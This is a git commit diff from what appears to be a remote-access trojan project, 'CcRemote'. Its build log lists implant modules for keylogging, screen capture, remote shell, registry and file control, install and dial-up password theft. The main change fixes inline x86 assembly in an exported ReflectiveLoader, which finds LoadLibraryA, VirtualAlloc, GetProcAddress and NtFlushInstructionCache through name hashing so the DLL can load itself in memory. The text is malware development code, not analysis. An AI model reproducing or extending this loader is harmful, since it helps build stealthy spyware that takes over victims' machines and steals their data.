asm load self success

2025-06-17 17:59:51 +00:00 · 2020-10-07 10:43:04 +08:00 · 2020-10-07 10:43:04 +08:00 · 8b28f3a9ef
commit 8b28f3a9ef
parent 18d728a346
4 changed files with 53 additions and 14 deletions
--- a/CcMainDll/.vs/CcMainDll/v15/.suo
+++ b/CcMainDll/.vs/CcMainDll/v15/.suo
--- a/CcMainDll/CcMainDll/Release/CcMainDll.Build.CppClean.log
+++ b/CcMainDll/CcMainDll/Release/CcMainDll.Build.CppClean.log
@ -1 +1,40 @@
+f:\myapp\ccremote\bin\server\ccmaindll.lib
+f:\myapp\ccremote\bin\server\ccmaindll.exp
+f:\myapp\ccremote\bin\server\ccmaindll.ipdb
+f:\myapp\ccremote\bin\server\ccmaindll.iobj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.pch
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\vc141.pdb
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\pch.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\audio.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\until.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\keyboardmanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\buffer.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\clientsocket.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\videomanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\videocap.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\systemmanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\shellmanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\servermanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenspy.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenmanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\regmanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditopt.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditex.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\manager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\kernelmanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\install.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\dialupass.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\audiomanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\filemanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\strcry.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\dllmain.obj
+f:\myapp\ccremote\bin\server\ccmaindll.dll
+f:\myapp\ccremote\bin\server\ccmaindll.pdb
 f:\myapp\ccremote\ccmaindll\ccmaindll\..\..\bin\server\ccmaindll.dll
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\ccmaindll.write.1u.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.command.1.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.read.1.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.write.1.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.command.1.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.read.1.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.write.1.tlog
--- a/CcMainDll/CcMainDll/dllmain.cpp
+++ b/CcMainDll/CcMainDll/dllmain.cpp
@ -344,26 +344,26 @@ inline DWORD calc_name_hash()
 		push    ebp
 		mov     ebp, esp
 		push    ecx
-		mov     [ebp-4], 0
+		mov     dword ptr[ebp-4], 0

 			calc_next:
-		mov     eax, [ebp-4]
+		mov     eax, dword ptr[ebp-4]
 		push    eax
 		call    call_ror_0xD
 		add     esp, 4
-		mov     [ebp-4], eax
-		mov     ecx, [ebp+8]
+		mov     dword ptr[ebp-4], eax
+		mov     ecx, dword ptr[ebp+8]
 		movsx   edx, byte ptr [ecx]
-		add     edx, [ebp-4]
-		mov     [ebp-4], edx
-		mov     eax, [ebp+8]
+		add     edx, dword ptr[ebp-4]
+		mov     dword ptr[ebp-4], edx
+		mov     eax, dword ptr[ebp+8]
 		add     eax, 1
-		mov     [ebp+8], eax
-		mov     ecx, [ebp+8]
+		mov     dword ptr[ebp+8], eax
+		mov     ecx, dword ptr[ebp+8]
 		movsx   edx, byte ptr [ecx]
 		test    edx, edx
 		jnz     calc_next
-		mov     eax, [ebp-4]
+		mov     eax, dword ptr[ebp-4]
 		mov     esp, ebp
 		pop     ebp
 		retn
@ -578,7 +578,7 @@ extern "C" __declspec(dllexport) void ReflectiveLoader()
 		mov     edx, [ebp+var_3c]			
 		mov     eax, [ebp+varLocalFS30_A]		// eax = varLocalFS30_A = 基地址
 		add     eax, [edx]						// 计算得到函数地址
-		mov     [ebp+LoadLibraryA], eax			// 保存到局部堆栈LoadLibraryA
+		mov     [ebp+pLoadLibraryA], eax			// 保存到局部堆栈LoadLibraryA
 		jmp     find_index_dec					// 查找下一个
 			
 			no_LoadLibraryA:                           
@ -597,7 +597,7 @@ extern "C" __declspec(dllexport) void ReflectiveLoader()
 		mov     eax, [ebp+var_3c]
 		mov     ecx, [ebp+varLocalFS30_A]		// ecx = varLocalFS30_A = 基地址
 		add     ecx, [eax]						// 计算得到函数地址
-		mov     [ebp+VirtualAlloc], ecx			// 保存到局部堆栈VirtualAlloc
+		mov     [ebp+ pVirtualAlloc], ecx			// 保存到局部堆栈VirtualAlloc
 		jmp     find_index_dec					// 查找下一个

 			no_VirtualAlloc:
@ -701,11 +701,11 @@ extern "C" __declspec(dllexport) void ReflectiveLoader()
 			check_function:
 		cmp     dword ptr[ebp+ pLoadLibraryA], 0
 		jz      continue_find_function
-		cmp     dword ptr[ebp+GetProcAddress], 0
+		cmp     dword ptr[ebp+ pGetProcAddress], 0
 		jz      continue_find_function
 		cmp     dword ptr[ebp+ pVirtualAlloc], 0
 		jz      continue_find_function
-		cmp     dword ptr[ebp+pNtFlushInstructionCache], 0
+		cmp     dword ptr[ebp+ pNtFlushInstructionCache], 0
 		jz      continue_find_function
 		jmp     find_moudle_over

--- a/bin/server/CcMainDll.dll
+++ b/bin/server/CcMainDll.dll